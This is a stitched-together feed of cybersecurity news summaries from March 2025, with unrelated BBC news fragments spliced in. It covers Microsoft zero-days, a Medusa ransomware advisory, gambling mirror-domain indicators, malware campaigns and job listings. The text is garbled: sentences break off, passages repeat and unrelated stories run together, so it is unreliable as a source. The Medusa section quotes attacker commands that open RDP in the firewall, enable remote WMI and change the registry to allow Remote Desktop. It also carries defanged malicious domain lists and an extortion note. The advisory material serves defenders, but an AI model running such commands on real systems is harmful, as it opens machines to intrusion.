An out-of-bounds read vulnerability in Windows NTFS that allows an authorized attacker to disclose information locally CVE-2025-24993 (CVSS score: 7.8) - A heap-based buffer overflow vulnerability in Windows NTFS that allows an unauthorized attacker to execute code locally (CVSS score: 7.8) - A heap-based buffer overflow vulnerability in Windows NTFS that allows an unauthorized attacker to execute code locally CVE-2025-26633 (CVSS score: 7.0) - An improper neutralization vulnerability in Microsoft Management Console that allows an unauthorized attacker to bypass a security feature locally ESET, which is credited with discovering and reporting CVE-2025-24983, said it first discovered the zero-day exploit in the wild in March 2023 and delivered via a backdoor named PipeMagic on compromised hosts.A Windows Win32 Kernel Subsystem use-after-free (UAF) vulnerability that allows an authorized attacker to elevate privileges locally (CVSS score: 7.0) - A Windows Win32 Kernel Subsystem use-after-free (UAF) vulnerability that allows an authorized attacker to elevate privileges locally CVE-2025-24984 (CVSS score: 4.6) - A Windows NTFS information disclosure vulnerability that allows an attacker with physical access to a target device and the ability to plug in a malicious USB drive to potentially read portions of heap memory (CVSS score: 4.6) - A Windows NTFS information disclosure vulnerability that allows an attacker with physical access to a target device and the ability to plug in a malicious USB drive to potentially read portions of heap memory CVE-2025-24985 (CVSS score: 7.8) - "Autosummary:
During the March 2025 Patch Tuesday, Microsoft also patched the following five zero-day vulnerabilities tagged as actively exploited: CVE-2025-24984 - Windows NTFS Information Disclosure Vulnerability CVE-2025-24985 - Windows Fast FAT File System Driver Remote Code Execution Vulnerability CVE-2025-24991 - Windows NTFS Information Disclosure Vulnerability CVE-2025-24993 - Windows NTFS Remote Code Execution Vulnerability CVE-2025-26633 - Microsoft Management Console Security Feature Bypass Vulnerability Yesterday, CISA added all six zero-days to its Known Exploited Vulnerabilities Catalog, ordering Federal Civilian Executive Branch (FCEB) agencies to secure their systems by April 1st, as required by the Binding Operational Directive (BOD) 22-01. "Autosummary:
The update is available for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later. "Autosummary:
IOCs MostBet – 2d593xv[.]com 3p4hdpmb[.]com 3z9sbhba58mst[.]com 4jls7l19[.]com 4rayasmb[.]com 560rp67[.]com 6q4mhfo[.]com 7tr85sq[.]com 9389z7h[.]com 9mnekb9[.]com ad2s0rs[.]com casinomstwins[.]com cdwxjlz[.]com jtw2fgmb[.]com llhrd3wu6vmb[.]com mfviz8eunkmb[.]com mkvw5jomb[.]com mostbet-in33[.]com mostbet-in34[.]com mostbet-in36[.]com mostbet-in37[.]com mostbet-in46[.]com mostbet-in56[.]com mostbet-in62[.]com mostbethu1[.]com mostbetru-44[.]com nfc5wbnalsmb[.]com ozvfgemb[.]com rw7e3v5gsumb[.]com sdma8tw[.]com sez67b24o7mb[.]com siosckmb[.]com sj13ywp[.]com szakt9s[.]com tqmdpkthxengz3g1[.]com v2izr0q9drmb[.]com vb7awyus6kmb[.]com w53hy6afrpmb[.]com winnerzonecasino[.]com ww16[.]mostbetru-44[.]com ww38[.]mostbetru-44[.]com x2cy2g8[.]com y16uyxu[.]com y2iqdt2[.]com ze59byq[.]com 22bet – 20-bet[.]ar 20-bet[.]at 20-bet[.]ca 20-bet[.]cz 20-bet[.]es 20-bet[.]in 20-bet[.]org 20-bet[.]pt 20-betbet[.]com 20-winbet[.]com 20bet-bet[.]com 20bet-bg[.]com 20bet-br[.]com 20bet-casino[.]org 20bet-co[.]org 20bet-dk[.]org 20bet-dk[.]site 20bet-es[.]com 20bet-fi[.]org 20bet-hr[.]org 20bet-hu[.]org 20bet-italia[.]com 20bet-jp[.]com 20bet-portuguese[.]com 20bet-s[.]com 20bet-win[.]com 20bet[.]asia 20bet[.]be 20bet[.]ch 20bet[.]cl 20bet[.]co[.]nz 20bet[.]com 20bet[.]com[.]de 20bet[.]com[.]in 20bet[.]com[.]pl 20bet[.]com[.]se 20bet[.]hu 20bet[.]icu 20bet[.]life 20bet[.]me 20bet[.]nz 20bet[.]org[.]in 20bet[.]vip 20bet[.]win 20bet1[.]com 20bet1[.]net 20bet1[.]org 20bet2[.]com 20bet3[.]com 20bet4[.]com 20bet5[.]com 20beta[.]com 20betapk[.]com 20betapp[.]com 20betb[.]com 20betbet[.]com 20betbr[.]com[.]br 20betbrasil[.]com 20betcasino[.]lat 20betcasino[.]mx 20betcasino[.]net 20betcasino[.]si 20betcasinoromania[.]org 20betcasinos[.]net 20betcassino[.]com 20betentrar[.]com 20betforum[.]com 20betgame[.]net 20betkasyno[.]pl 20betlogin[.]it 20betluck[.]com 20betlucks[.]com 20betmirror[.]com 20beto[.]com 20betpartners[.]com 20betportugues[.]com 20bets[.]cc 20bets[.]com[.]br 20bets[.]in 20bets[.]org 20bets[.]pe 20bets[.]pl 20betsite[.]com 20bett[.]com 20bett[.]org 20bettin[.]com 20betting[.]com 20betzone[.]com 20bplay[.]com 20bwin[.]com 20bwin[.]pt 20bwins[.]com 20glob[.]com 20luckbet[.]com 20media[.]world 20win88[.]com 20winluck[.]com aposta20bet[.]com apostas20[.]com bet-20[.]it bet-20[.]pl bet20[.]com[.]br bet20[.]com[.]pl bet20[.]com[.]pt bet20[.]gr bet20[.]online bet20[.]pt bet20brasil[.]com bet20brazil[.]com bet20italia[.]com bet20portugal[.]com bet20pt[.]com bonus-20bet[.]com bookie20[.]com es20bet[.]com esbet20[.]com forum20bet[.]com free-bookie[.]com free20bet[.]com links20[.]world mail20media[.]com pt-20bet[.]com svkzjv[.]com twentybet[.]net xxbet[.]it xxbetportugal[.]com How gambling companies exploit mirror domains A mirror site is essentially a clone of an existing betting website, hosted on a different domain. How to protect yourself from betting scams With the rise of mirror sites, it’s more important than ever to be cautious when engaging in online sports betting. "Autosummary:
As she walks the neighbourhood, Ms Pichardo finds people passed out on the pavement, a woman in a stupor with her trousers down, a man lying prone next to a metro turnstile, another man in a wheelchair, his eyes closed and money in his hands.She bristles at the terms like "addict", "junkie" or "zombie", which have been used to describe the people of her neighbourhood.A memorial to thousands of fentanyl overdose victims is displayed at the Drug Enforcement Administration"s headquarters President Sheinbaum has also recently emphasised the demand side of the crisis, saying the US fentanyl crisis began with the legal but "irresponsible approval" of painkillers, such as OxyContin, starting in the late 1990s. Darren Conway/BBC Rosalind Pichardo has reversed thousands of opioid overdoses with the drug Naxolone Ms Pichardo, who runs a drop-in centre called Sunshine House, operates what she calls a "no-judgement zone"."Look at this one, seven years old, two Narcans," she points out.Mexico has also made it harder to import a key ingredient of fentanyl from China, prompting cartels to reduce the strength of each pill - and, in the process, making them less deadly. "Autosummary:
"Autosummary:
The library is installed in millions of systems and services, including Linux, Android, game engines, GUI frameworks, and online platforms. "Autosummary:
"As of February 2025, Medusa developers and affiliates have impacted over 300 victims from a variety of critical infrastructure sectors with affected industries including medical, education, legal, insurance, technology, and manufacturing," CISA, the FBI, and MS-ISAC warned on Wednesday. "Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2025-24983 Microsoft Windows Win32k Use-After-Free Vulnerability CVE-2025-24984 Microsoft Windows NTFS Information Disclosure Vulnerability CVE-2025-24985 Microsoft Windows "Autosummary:
Microsoft Patch Tuesday security updates for March 2025 fix six actively exploited zero-days Pierluigi Paganini March 12, 2025 March 12, 2025 Microsoft Patch Tuesday security updates for March 2025 address 56 security vulnerabilities in its products, including six actively exploited zero-days. "The post Cybersecurity jobs available right now: March 11,2025 appeared first on Help Net Security.
"Autosummary:
Senior Penetration Tester Ekco | Ireland | On-site – View job details As a Senior Penetration Tester, you will conduct comprehensive penetration tests on clients’ systems across various platforms (including web applications, mobile applications, thick client applications, infrastructure, APIs, cloud platforms) to identify security vulnerabilities, weaknesses, and potential risks. Digital Security – Principal Specialist, Security Risk & Assurance AVEVA | United Kingdom | Hybrid – View job details As a Digital Security – Principal Specialist, Security Risk & Assurance, you will build, operate, and optimise security risk management and risk assurance services that enable effective, and data driven risk management and reporting across operations. Open-Source Intelligence Analyst/Senior Associate, Forensic Deloitte | Canada | Hybrid – View job details As an Open-Source Intelligence Analyst/Senior Associate, Forensic, you collect, assess and disseminate publicly available data and information from social media, deep, and dark web sources in response to priority intelligence requirements on matters relating to financial crime, integrity and reputation concerns, strategy and a variety of risk issues. Endpoint Security Engineer HCLTech | UAE | On-site – View job details As an Endpoint Security Engineer, you will design, deploy, and manage endpoint security solutions such as antivirus, EDR, DLP, and device control systems. "Autosummary:
"CISOs face mounting pressure to spend wisely on security. Yet, many organizations remain vulnerable due to misplaced priorities and inefficient budgeting. This article explores common pitfalls and offers strategies to strengthen cybersecurity. Recent data highlights a paradox: while cybersecurity budgets rise, security incidents continue unabated. A survey by the Ponemon Institute revealed a 59% increase in cyber budgets year-over-year, yet 61% of organizations experienced a data breach or cybersecurity incident in the past two years. … More
The post Smart cybersecurity spending and how CISOs can invest where it matters appeared first on Help Net Security.
"Autosummary:
When security spending isn’t part of a closed-loop system that connects real-world threats to measurable outcomes, you’re essentially paying for digital theater rather than actual protection,” Alex Rice, CTO at HackerOne, told Help Net Security. Areas that need more investment Incident response planning Many organizations lack an incident response plan, leading to prolonged recovery times and increased breach costs. Recommendation: Allocate funds for ongoing, role-specific cybersecurity training to foster a security-aware culture. "The global transition to remote work has reshaped traditional workplace dynamics, introducing challenges and opportunities for cybersecurity teams. For CISOs and security professionals, embracing a remote workforce can be a strategic advantage, enhancing team capabilities and driving the modernization of security practices. Specialized security positions For CISOs struggling to fill highly specialized cybersecurity roles, remote work provides a critical advantage: access to a global talent marketplace where niche expertise is more readily available. Instead of … More
The post How remote work strengthens cybersecurity teams appeared first on Help Net Security.
"Autosummary:
For example, having deep-knowledge specialists distributed around the world, working flexible hours, allows an organization to pull them in during an incident response, whatever the time of day, or day of the week. "Autosummary:
"Autosummary:
"Autosummary:
Table 2: Geopolitical Factors Affecting Cross-Border Data Transfers Factor Impact on Data Transfers Trade Restrictions Limits data exchange between certain countries Data Localization Laws Requires in-country storage, increasing compliance costs Government Surveillance Laws Allows state access to private sector data Cybersecurity Diplomacy Conflicts Disrupts international cooperation on cybersecurity standards As geopolitical tensions continue to rise, businesses must remain vigilant in monitoring changes in regulatory policies that could impact their ability to transfer data securely.At the same time, the growing threats of cyberattacks, including ransomware, phishing, and insider threats, highlight the need for continuous monitoring, automated compliance solutions, and robust security architectures to safeguard sensitive data during cross-border transactions.Hackers deploy various techniques, such as man-in-the-middle attacks, ransomware, phishing schemes, and supply chain compromises, to intercept, manipulate, or steal sensitive data.Cybersecurity Challenges in Cross-Border Data Transfers and Regulatory Compliance Strategies Pierluigi Paganini March 11, 2025 March 11, 2025 Cross-border data transfers enable global business but face challenges from varying cybersecurity laws, increasing risks of cyberattacks and data breaches. "Autosummary:
"Autosummary:
" Some of the supported commands are listed below - flooder, which triggers a flood attack exploiter, which exploits CVE-2023-1389 start, an optional parameter that is used with the exploiter to start the module close, which stops the module triggering function shell, which runs a Linux shell command on the local system. "Autosummary:
"Having an approach that helps you discover things that give you a better sense of whether you"re going to like it allows you to invest your money, and for me, more importantly, your time in the things that you really enjoy," he says."And so what we"re hoping is not just to get the popular games everybody"s playing, but those kind of odd little games that would be a perfect match just for you," says Andy."Hopefully, they"re finding the things that existing algorithms are missing - really high quality games that didn"t quite get the marketing at launch or the media coverage," she says. "Autosummary:
PackerD1 decrypts and injects PackerD2, which eventually decompresses and extracts the final payload, MassJacker, and injects it into the legitimate Windows process "InstalUtil.exe." MassJacker infection chain Source: CyberArk MassJacker monitors the clipboard for cryptocurrency wallet addresses using regex patterns, and if a match is found, it replaces it with an attacker-controlled wallet address from an encrypted list. "Autosummary:
"Autosummary:
PowerSchool is a cloud-based K-12 software provider serving over 60 million students and 18,000 customers worldwide, offering enrollment, communication, attendance, staff management, learning, analytics, and finance solutions. "As AI technology advances, cybercriminals create more personalized and convincing scams. This includes mimicking voices, deepfake videos, and highly convincing phishing emails that are difficult to spot. Phishing, deepfakes, and voice cloning are among the most common AI-driven techniques used by cybercriminals. Phishing: Ivanti’s research shows that attackers use GenAI to craft believable content at scale and low cost, making phishing attacks more effective. They believe that this threat vector will become even more powerful … More
The post How to spot and avoid AI-generated scams appeared first on Help Net Security.
"Autosummary:
GenAI has made it easier for cybercriminals to create convincing deepfakes, phishing campaigns, and investment scams, enhancing their efficiency, but the good news is that adversaries’ use of GenAI has not yet matched the hype. Tips to protect against AI-generated scams Whether it’s an email, phone call, or message on social media, always approach unsolicited contact with caution. "Autosummary:
"Autosummary:
The number of bugs in each vulnerability category is listed below: 23 Elevation of Privilege Vulnerabilities 3 Security Feature Bypass Vulnerabilities 23 Remote Code Execution Vulnerabilities 4 Information Disclosure Vulnerabilities 1 Denial of Service Vulnerabilities 3 The actively exploited zero-day vulnerability in today"s updates are: CVE-2025-24983 - Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability Microsoft says this vulnerability will allow local attackers to gain SYSTEM privileges on the device after winning a race condition. "Autosummary:
While the HTML file, named "Ver Datos del Formulario.html," was deleted from the repository on February 25, 2025, it has been found to contain details such as usernames, passwords, email, email passwords, and ATM PINs associated with individuals, government agencies, educational institutions, and businesses operating in Colombia. "Autosummary:
Switzerland’s NCSC requires cyberattack reporting for critical infrastructure within 24 hours Pierluigi Paganini March 11, 2025 March 11, 2025 Switzerland’s NCSC mandates critical infrastructure organizations to report cyberattacks within 24 hours of discovery. "Autosummary:
The flaw impacts iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later, Macs running macOS Sequoia, and Apple Vision Pro. Apple did not disclose details about the attacks or attribute them to any threat actor. "Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders detailing various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate known Medusa ransomware TTPs and IOCs, identified through FBI investigations as recently as February 2025.
Medusa is a ransomware-as-a-service (RaaS) variant first identified in June 2021. As of February 2025, Medusa developers and affiliates have impacted over 300 victims from a variety of critical infrastructure sectors with affected industries including medical, education, legal, insurance, technology, and manufacturing. The Medusa ransomware variant is unrelated to the MedusaLocker variant and the Medusa mobile malware variant per the FBI’s investigation.
FBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of Medusa ransomware incidents.
Download the PDF version of this report:
For a downloadable list of IOCs, see:
Autosummary: Once a foothold in a victim network is established, commonly scanned ports include: 21 (FTP) (FTP) 22 (SSH) (SSH) 23 (Telnet) (Telnet) 80 (HTTP) (HTTP) 115 (SFTP) (SFTP) 443 (HTTPS) (HTTPS) 1433 (SQL database) (SQL database) 3050 (Firebird database) (Firebird database) 3128 (HTTP web proxy) (HTTP web proxy) 3306 (MySQL database) (MySQL database) 3389 (RDP) Medusa actors primarily use PowerShell [T1059.001] and the Windows Command Prompt (cmd.exe) [T1059.003] for network [T1046] and filesystem enumeration [T1083] and to utilize Ingress Tool Transfer capabilities [T1105]. The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate known Medusa ransomware TTPs and IOCs, identified through FBI investigations as recently as February 2025.Medusa IABs (affiliates) are known to make use of common techniques, such as: Discovery Medusa actors use living off the land (LOTL) and legitimate tools Advanced IP Scanner and SoftPerfect Network Scanner for initial user, system, and network enumeration. netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow Then, a rule to allow remote WMI connections is created: netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes Finally, the registry is modified to allow Remote Desktop connections: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /tInvestigations identified Medusa actors using remote access software AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp, and Splashtop. "
Autosummary:
" The approach has been used as part of schemes that propagate stealers, remote access tools (RATs), trojans that provide hidden remote access, and cryptocurrency miners like NJRat, XWorm, Phemedrone, and DCRat. "Autosummary:
"Even if the company suspected that no data was stolen, when facing an issue that could have resulted in a data breach, especially with data of the nature in question, an investigation and confirmation from a suitably qualified cybersecurity expert would be advisable," says Scott Helme, a security researcher.However, the software bug, discovered in November, made Medefer"s internal patient record system vulnerable to hackers, the engineer said. "Autosummary:
To ensure the evaluations reflect current cyberthreats, each round of testing follows three steps: Collecting and verifying in-the-wild malware: AVLab regularly collects malware samples from malicious and active URLs, testing the malware samples to understand their impact to networks and endpoints. "Autosummary:
Specifically, it terminates processes associated with various .NET services that could prevent the malware from starting, deletes files with the extensions BAT, PS1, and VBS from "C:\ProgramData\WindowsHost" and "C:\Users\Public" folders, and creates a new VBS file in C:\ProgramData\WindowsHost, and BAT and PS1 files in C:\Users\Public. "Autosummary:
Moonstone Sleet threat actors target financial and cyberespionage victims using trojanized software, custom malware, malicious games, and fake companies like StarGlow Ventures and C.C. Waterfall to engage victims on LinkedIn, freelancing sites, Telegram, and email. "Autosummary:
Large-scale cryptocurrency miner campaign targets Russian users with SilentCryptoMiner Pierluigi Paganini March 10, 2025 March 10, 2025 Experts warn of a large-scale cryptocurrency miner campaign targeting Russian users with SilentCryptoMiner.Using this social engineering trick, threats like stealers, RATs, Trojans, and crypto miners can persist undetected. "Autosummary:
Even though devices used to test the purchased services had no performance or security issues and were running antivirus software, scanning them using the two companies" software "revealed" hundreds of issues requiring repair, including "PC Privacy issues," "Crashed Programs," "Junk files," and "Broken Registry issues. "Autosummary:
"Autosummary:
"The Cybersecurity Trinity provides a comprehensive approach to modern cybersecurity by integrating AI, automation, and active cyber defense (ACD) into a unified strategy. Instead of addressing these elements in isolation, the author demonstrates how they work together to enhance security effectiveness, offering a practical and actionable framework grounded in the NIST Cybersecurity Framework. About the author Donnie Wendt, an adjunct professor of cybersecurity at Utica University, brings over 30 years of hands-on experience in cybersecurity, … More
The post Review: The Cybersecurity Trinity appeared first on Help Net Security.
"Autosummary:
About the author Donnie Wendt, an adjunct professor of cybersecurity at Utica University, brings over 30 years of hands-on experience in cybersecurity, combining practical implementation expertise with academic research to explore security strategies. "Pondurance announced a major new version of its cybersecurity platform. Pondurance Platform 2.0 provides the foundation for Pondurance’s risk-based MDR service specifically designed to eliminate breach risks. With this announcement, Pondurance arms customers with the latest monitoring, detection, and response capabilities through a new platform that encompasses everything organizations entrusted with personal customer information need to protect themselves from breach risks. This unified portal enables them to detect, respond to, and remediate cyber threats in … More
The post Pondurance Platform 2.0 identifies data breach risks appeared first on Help Net Security.
"Autosummary:
The core of this new platform is the technology that integrates with EDR tools and feeds from network, identity, cloud, and applications sources in order to analyze this telemetry information, bubble up the highest-risk threats that have been detected, and triage and take action, if necessary.The core of this new platform is the technology that integrates with EDR tools and feeds from network, identity, cloud, and applications sources in order to analyze this telemetry information, bubble up the highest-risk threats that have been detected, and triage and take action, if necessary. “Our newly released Pondurance Platform 2.0 represents the culmination of a yearslong effort to reinvent a cloud-native, AI-enabled platform in order to use risk-based algorithms and methodologies for cybersecurity threat detection, response, and automated disruption,” said Enzo Arefi, CTO at Pondurance.With a single click, it can ingest logs from a selection of hundreds of network, identity, cloud, and application devices and software and will access world-class threat intelligence, bubble up the ones most likely to create data breach risks, and take remediation action.With a single click, it can ingest logs from a selection of hundreds of network, identity, cloud, and application devices and software and will access world-class threat intelligence, bubble up the ones most likely to create data breach risks, and take remediation action. "Autosummary:
In July 2024, the Akamai Security Intelligence Response Team (SIRT) warned that multiple threat actors were exploiting the PHP vulnerability CVE-2024-4577 to deliver multiple malware families, including Gh0st RAT, RedTail cryptominers, and XMRig. “Threat actors continued the speedy-time-from-disclosure-to-exploitation trend and were quick to leverage this new vulnerability — we observed exploit attempts targeting this PHP flaw on our honeypot network within 24 hours of its disclosure.” reported Akamai. "Autosummary:
"Autosummary:
"Autosummary:
“This is amongst the longest Twitter outages tracked in terms of duration, and the pattern is consistent with a denial of service attack targeting X’s infrastructure at scale,” Alp Toker, director of internet monitor Netblocks, told Recorded Future News. "Autosummary:
"Autosummary:
While parking scams have been around for years, a massive wave of phishing text messages has caused numerous cities throughout the US to issue warnings, including from Annapolis, Boston, Greenwich, Denver, Detroit, Houston, Milwaukee, Salt Lake City, Charlotte, San Diego, San Francisco, and many others. "Autosummary:
Eventually, it downloads the final payload, SilentCryptoMiner, a modified version of XMRig capable of mining multiple cryptocurrencies, including ETH, ETC, XMR, and RTM. "Autosummary:
Potentially exposed information includes contract number, customer name (contract name), name of customer contact, telephone number, email address, address, information related to service use. "Autosummary:
"Autosummary:
Akira ransomware gang used an unsecured webcam to bypass EDR Pierluigi Paganini March 08, 2025 March 08, 2025 The Akira ransomware gang exploited an unsecured webcam to bypass EDR and launch encryption attacks on a victim’s network. The Akira ransomware has been active since March 2023, the threat actors behind the malware claim to have already hacked multiple organizations in multiple industries, including education, finance, and real estate. "Autosummary:
"Autosummary:
Qilin Ransomware gang claims the hack of the Ministry of Foreign Affairs of Ukraine Pierluigi Paganini March 07, 2025 March 07, 2025 Qilin Ransomware group claims to have breached the Ministry of Foreign Affairs of Ukraine, marking a significant cybersecurity attack. "Traditional training often lacks the hands-on experience cybersecurity teams need to counter advanced threats. AI-powered gamified simulations combine artificial intelligence with interactive learning to enhance their skills. Conventional cybersecurity training programs frequently rely on static content, which can become outdated. These programs may also lack the engagement necessary to maintain participant interest, leading to suboptimal retention of critical skills. In contrast, gamified simulations introduce dynamic, scenario-based learning environments that mirror real-world cyber threats, fostering more … More
The post Can AI-powered gamified simulations help cybersecurity teams keep up? appeared first on Help Net Security.
"Autosummary:
In contrast, gamified simulations introduce dynamic, scenario-based learning environments that mirror real-world cyber threats, fostering more profound understanding and retention. "Autosummary:
Microsoft says Moonstone Sleet hackers are targeting both financial and cyberespionage targets using trojanized software (e.g., PuTTY), custom malware loaders, malicious games and npm packages, and fake software development companies (e.g., C.C. Waterfall, StarGlow Ventures) set up to interact with potential victims on LinkedIn, various freelancing networks, Telegram, or via email. "Armis has acquired OTORIO, a provider of OT/ ICS cyber security solutions. This accelerates Armis’ roll out of an on premise version of its Cyber Exposure Management platform, Armis Centrix and cements its leadership in cyber physical systems (CPS) security. Armis will fully integrate OTORIO’s Titan platform into Armis Centrix, delivering a single, comprehensive solution for critical infrastructure, manufacturing and industrial environments: Armis Centrix for OT/IoT Security (On-Prem) ensures robust, localised protection for air-gapped or … More
The post Armis acquires OTORIO to strenghten OT and IoT security appeared first on Help Net Security.
"Autosummary:
Secure remote access (SRA) : Enforce MFA, SSO, and access policies on all users, devices, workloads, applications, and data across all cloud, datacenter, and cyber-physical infrastructure. "Autosummary:
"Autosummary:
The operation involved the U.S. DOJ, FBI, Europol, and law enforcement from Germany, the Netherlands, Finland, and Estonia. "Autosummary:
Medusa Ransomware targeted over 40 organizations in 2025 Pierluigi Paganini March 07, 2025 March 07, 2025 Medusa ransomware has claimed nearly 400 victims since January 2023, with attacks increasing by 42% between 2023 and 2024. "Autosummary:
" The Russian exchange was previously sanctioned by the Treasury Department"s Office of Foreign Assets Control (OFAC) in April 2022 after over $100 million in Garantex transactions were linked to darknet markets and cybercrime actors, including the notorious Conti Ransomware-as-a-service (RaaS) operation and the Hydra dark web market. "Autosummary:
"Autosummary:
"It employs advanced obfuscation, encryption, and anti-analysis techniques, including PowerShell-based payloads, RC4 and Base64 decryption routines, dynamic process injection, token manipulation, and lateral movement capabilities," PRODAFT said. "Autosummary:
"Autosummary:
"I personally reached out to them and received a response, but all they said was that the device in question, IC-7100, was end of life, therefore not receiving further updates. "Autosummary:
Mirai-based botnets exploit CVE-2025-1316 zero-day in Edimax IP cameras Pierluigi Paganini March 07, 2025 March 07, 2025 Mirai-based botnets are exploiting a zero-day flaw, tracked as CVE-2025-1316, in Edimax IP cameras, to achieve remote command execution. "Autosummary:
The individuals include two officers of the People"s Republic of China"s (PRC) Ministry of Public Security (MPS), eight employees of an ostensibly private PRC company, Anxun Information Technology Co. Ltd. (安洵信息技术有限公司) also known as i-Soon, and members of Advanced Persistent Threat 27 (APT27, aka Budworm, Bronze Union, Emissary Panda, Lucky Mouse, and Iron Tiger) - Wu Haibo (吴海波), Chief Executive Officer Chen Cheng (陈诚), Chief Operating Officer Wang Zhe (王哲), Sales Director Liang Guodong (梁国栋), Technical Staff Ma Li (马丽), Technical Staff Wang Yan (王堰), Technical Staff Xu Liang (徐梁), Technical Staff Zhou Weiwei (周伟伟), Technical Staff Wang Liyu (王立宇), MPS Officer Sheng Jing (盛晶), MPS Officer Yin Kecheng (尹可成), APT27 actor aka "YKC" Zhou Shuai (周帅), APT27 actor aka "Coldface" "These malicious cyber actors, acting as freelancers or as employees of i-Soon, conducted computer intrusions at the direction of the PRC"s MPS and Ministry of State Security (MSS) and on their own initiative," the DoJ said. "Autosummary:
I just hope that it ends quickly," said Iowa farmer Bob Hemesath, the board president for lobby group Farmers for Free Trade, which has raised concerns about the tariffs. "Autosummary:
The Treasury Committee - which has been investigating the impact of banking IT failures - compelled Barclays, HSBC, Lloyds, Nationwide, Santander, NatWest, Danske Bank, Bank of Ireland and Allied Irish Bank to provide the data. "Autosummary:
"Autosummary:
" These changes underscore active tweaks to EncryptHub"s kill chain, with the threat actor also developing new components like EncryptRAT, a command-and-control (C2) panel to manage active infections, issue remote commands, and access stolen data. "Autosummary:
The development comes as the ransomware landscape continues to be in a state of flux, with a steady stream of new RaaS operations, such as Anubis, CipherLocker, Core, Dange, LCRYX, Loches, Vgod, and Xelera, emerging in the wild in recent months. "Autosummary:
“HAIBO, 43; CHENG, 40; GUODONG, 32; LI, 31; YAN, 35; ZHE, 44; WEIWEI, 37; LIANG, 28; LIYU, 36; and JING, 36, all nationals of China, are charged with conspiracy to commit computer intrusions, which carries a maximum sentence of five years in prison, and conspiracy to commit wire fraud, which carries a maximum sentence of 20 years in prison.” concludes the announcement. The US authorities are offering a reward for the following individuals: Wu Haibo (吴海波), Chief Executive Officer Chen Cheng (陈诚), Chief Operating Officer Wang Zhe (王哲), Sales Director Liang Guodong (梁国栋), Technical Staff Ma Li (马丽), Technical Staff Wang Yan (王堰), Technical Staff Xu Liang (徐梁), Technical Staff Zhou Weiwei (周伟伟), Technical Staff "Autosummary:
Key features of the academy include: Expert guidance from industry experts who share their practical knowledge and experience on a wide range of essential vCISO functions, including risk and compliance assessments, cybersecurity strategy development, and effective communication of risks to executive teams.Download to get a better understanding of the vCISO’s main duties, roles and responsibilities Download for free The Expertise Gap in Delivering vCISO Services While the market for vCISO services is rapidly expanding, many MPSs and MSSPs struggle to offer these services due to lack of in-house expertise and resources. "Autosummary:
I regret to inform you that we have gained access to [REDACTED] systems and over the past several weeks have exported thousands of data files, including customer order and contact information, employee information with IDs, SSNs, payroll reports, and other sensitive HR documents, company financial documents, legal documents, investor and shareholder information, invoices, and tax documents. "CISO Amplitude | USA | Hybrid – View job details As a CISO, you will develop, implement, and maintain a comprehensive security strategy aligned with Amplitude’s business goals and risk tolerance. Oversee the identification, assessment, and mitigation of security risks across the organization and its product lines. Lead and coordinate investigations into security incidents, ensuring timely resolution and thorough post-incident reviews. Cloud Cyber Security Technical Advisor (GRC) – VP MUFG | USA | On-site – … More
The post Cybersecurity jobs available right now in the USA: March 6, 2025 appeared first on Help Net Security.
"Autosummary:
Cyber Security Engineer, Senior Consultant – Cloud Security Visa | USA | Hybrid – View job details As a Cyber Security Engineer, Senior Consultant – Cloud Security, you will be responsible for security architecture for hybrid cloud and support design of cloud solutions meeting standardization, consolidation, security, and regulatory compliance, for different use cases. Cybersecurity Engineer Ace Hardware | USA | On-site – View job details As a Cybersecurity Engineer, you will implement and configure security solutions, such as firewalls, encryption, authentication, authorization, logging, and monitoring, to protect web applications from cyberattacks and ensure compliance with security policies and regulations. Principal Incident Response Engineer Acrisure | USA | On-site – View job details As a Principal Incident Response Engineer, you will develop and implement incident response plans, including threat detection, investigation, containment, eradication, and recovery. Cyber Defense Incident Responder Edgewater Federal Solutions | USA | Hybrid – View job details As a Cyber Defense Incident Responder, you will perform cyber defense incident triage, to include determining scope, urgency, and potential impact, identifying the specific vulnerability, and making recommendations that enable expeditious remediation. "Autosummary:
"Autosummary:
Eventually, the threat actors dropped a password-protected ZIP file (win.zip) containing the ransomware payload (win.exe), but the victim"s EDR tool detected and quarantined it, essentially blocking the attack. "Autosummary:
"Autosummary:
Share Save Will Grant Mexico Correspondent, BBC News Share Save Watch: Call with Trump "very, very respectful", says Mexico"s Sheinbaum In announcing the decision to postpone some tariffs on Mexico for another month, US President Donald Trump was at pains to praise his Mexican counterpart, Claudia Sheinbaum. "Autosummary:
Eventually, the threat actors dropped a password-protected ZIP file (win.zip) containing the ransomware payload (win.exe), but the victim"s EDR tool detected and quarantined it, essentially blocking the attack. "Autosummary:
